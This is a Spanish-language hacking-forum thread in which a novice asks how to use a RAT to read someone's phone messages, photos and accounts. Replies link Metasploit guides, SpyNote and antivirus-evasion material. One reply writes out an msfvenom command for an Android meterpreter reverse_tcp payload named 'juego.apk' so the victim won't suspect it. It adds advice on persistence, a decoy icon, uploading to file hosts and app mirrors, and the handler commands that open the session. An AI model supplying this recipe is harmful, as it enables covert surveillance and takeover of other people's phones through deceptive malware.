Hack x Crack - Comunidad de Seguridad informática

Hack x Crack => Dudas Generales => Mensaje iniciado por: frostzaydazarcof en Agosto 18, 2020, 05:01:46 am

Título: dudas de como utilizar un rat
Publicado por: frostzaydazarcof en Agosto 18, 2020, 05:01:46 am
hola soy muy nuevo en esto y quisiera saber informacion sobre rat se que son sofwares hasta donde yo entiendo Remote Administration Tool
algo como un troyano si no me quivoco quisiera saber si con estas herramientas podria buscar un exploit o mejor dicho una vulnerabilidad para poder
administrar o ver la informacion guardada en un telefono celular solo conociendole el numero de dicho celular? de estar mal hecha mi pregunta sepan
disculpar mi ignorancia hay algun tipo de tecnica o tutorial para accerder a un celular y ver su contenido ya sea wattsap conversaciones cuentas de facebook
fotos etc.., se que le llaman phreaking hay tutoriales dentro del foro que esten actualizados sobre estas tecnicas? hay tutoriales desde cero para aprender exploits
o el uso de payload o rat hechos por terceros y que tan confiables pueden resultar aquellos que ustedes puedan informarme? desde ya muy agradecido por ultimo inyección sql
hay manuales que expliquen tecnicas dedicadas a telefonia movil si es que las hay?
pd: dejo este mensaje aqui ya que no conosco bien la ubicacion de donde deve ir estas preguntas.
Título: Re:dudas de como utilizar un rat
Publicado por: R3LI4NT en Agosto 19, 2020, 02:44:09 am
Te acabas de responder tu mismo. Sí, se puede con payloads y exploits, en el foro se ha hablado de eso.
Con solo buscar "crear payload para android" ya te salen muchos resultados útiles.

Crear PAYLOAD para Android con Metasploit (https://hackingot.blogspot.com/2017/02/payload-android-control-remoto.html)

Edit: Por cierto... aquí no enseñamos a "jakear" cuentas de facebook o espiar WhatsApp.

(https://imagizer.imageshack.com/img922/963/Zob71w.jpg)

Título: Re:dudas de como utilizar un rat
Publicado por: frostzaydazarcof en Agosto 19, 2020, 04:36:08 am
R3LI4NT desde ya muchas gracias por la informacion desde ya no es para filtrarme a la intimidad de nadie pero lo probare
a modo de experiencia con mi propio celular primero debo informarme bien de lo que voy hacer antes de que me vuele en la cara
Título: Re:dudas de como utilizar un rat
Publicado por: R3LI4NT en Agosto 19, 2020, 04:50:30 am
De todas formas yo te recomiendo primero que estudies MetaSploit.

Manual de Metasploit

Fundamentos de Metasploit
o msfcli
o msfweb
o msfconsole
o Exploits
o Payloads
o Meterpreter

Link: http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf

Saludos

#R3LI4NT
Título: Re:dudas de como utilizar un rat
Publicado por: poseidon en Agosto 19, 2020, 11:13:29 pm
Puedes usar un R.A.T  Cliente - servidor. Tu configuras el Cliente para que conecte a ti, puerto, y mas configuración que traen.  Despues te genera un servidor que es el que se tienes que "Instalar" en el objetivo. Para hacer pruebas tienes https://github.com/cymilad/SpyNote.
Título: Re:dudas de como utilizar un rat
Publicado por: frostzaydazarcof en Agosto 26, 2020, 12:57:53 pm
bueno les agradesco su ayuda gracias a eso estoy explorando nuevos orizontes hoy dia me encuentro usando virtualbox y monte un S.O Kali Linux
navegando por una pagina https://thesecuritysentinel.es/utilizar-metasploit-para-crear-un-payload-ofuscado-y-que-evada-la-deteccion-de-los-antivirus/
cree a mi parecer un payload lo que a mi parecer solo es un fichero algo raro perdon por mi ignorancia pero aun me encuentro en pañales todo bien pero
me surgio otra pregunta y ahora que hago con ese fichero que se crea al final de usar todo eso que te dicen que hagas ¿como lo utilizo? lo envio por mail a la
victima osea a mi mismo lo abro desde mi celular y ya me jodi? o hay algo que estoy muy seguro me perdi de un buen tramo? o ay alguna consola que debo
crearme para dirigirmelo a mi mismo a mi celular desde mi pc o desde otro celular por que no tengo otro celular mas que el mio y mis amigos ni loco quieren
que utilice el de ellos y meta ese archivo que por mi parecer es muy inofencivo algun dato lo que sea me ayudara a seguir explorando desde ya se que les
estoy causando gracia y deben de estar preguntandose ¿es un idiota o un nene? roma no se hizo en un dia y yo digamos estoy creando mi imperio desde
arriba de un arbol con una futura tormenta si lo ven de esa forma y mi unica defenza es ese archivito que cree y parece algo metalico ya se imaginaran no es asi (jajaja).
Título: Re:dudas de como utilizar un rat
Publicado por: R3LI4NT en Agosto 26, 2020, 05:18:00 pm
Cuando creas el payload para android debes de darle un nombre a esa apk, por ejemplo: "msfvenom -p android/meterpreter/reverse_tcp LHOST=xxxx LPORT=xxxx R > juego.apk"
Eso es para que la persona no sospeche que se trata de un malware y lo puedas asociar con la Ingeniería social. Otra cosa... hazlo persistente para que tengas la sesión guardada, como un tipo de "backdoor" que te permite ingresar nuevamente al sistema o dispositivo cuando quieras.
También lo puedes acompañar con un icono para que sea menos sospechoso, además de que lo puedes hacer indetectable. Una vez hecho todo lo anterior lo subes a servicio de alojamiento de archivos como Mega, Mediafire, AnonFile o algún otro (en APKMirror (https://www.apkmirror.com/) puedes subir tu apk gratis)
Antes de que la víctima descargue el apk se obtiene una shell Meterpreter y ahí ejecutas lo siguiente:

Código: [Seleccionar]
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST "XXXX"
set LPORT "XXX"
exploit

Cuando la víctima lo instala te saldra "meterpreter session 1 opened"

Esperó que me haya podido explicar bien.
Título: Re:dudas de como utilizar un rat
Publicado por: poseidon en Agosto 27, 2020, 12:47:24 am
Hola, creo que lo que quieres conseguir es algo complicado para ti. Deberías entender el Malware y que tipos hay. Porque no es crear un Payload y enviarlo por Wathsapp y ya tendrás control total del teléfono. Para empezar que los teléfonos no instalan y advierten que van a ejecutar una aplicación que no esta firmada digitalmente y que no es de Play Store. Y todo lo que encuentres publico va a ser detectado por todo tipo de cosas, desde gmail asta el Play Store. Yo, la mejor recomendación que te puedo dar es que te estudies como funciona el malware y que tipos hay. Y sobre la marcha iras comprendiendo.
Título: Re:dudas de como utilizar un rat
Publicado por: R3LI4NT en Agosto 27, 2020, 04:38:49 pm
Coincido con lo que te han respondido. Lo mejor es entender el funcionamiento  de malware (spyware, troyano, virus, etc) y así programar uno propio, además de que te va a servir para estar más atento a los programas de tercero que puedas llegar a descargar.
Yo te di una respuesta momentánea que puede que te sirva hoy pero de esa manera no aprenderas nada detrás de ella.
Título: Re:dudas de como utilizar un rat
Publicado por: frostzaydazarcof en Agosto 29, 2020, 03:30:37 am
desde ya muchisimas gracias por toda la informacion brindada desde ahora tendre que esforzarme mas en aprender nuevos lenguajes de programacion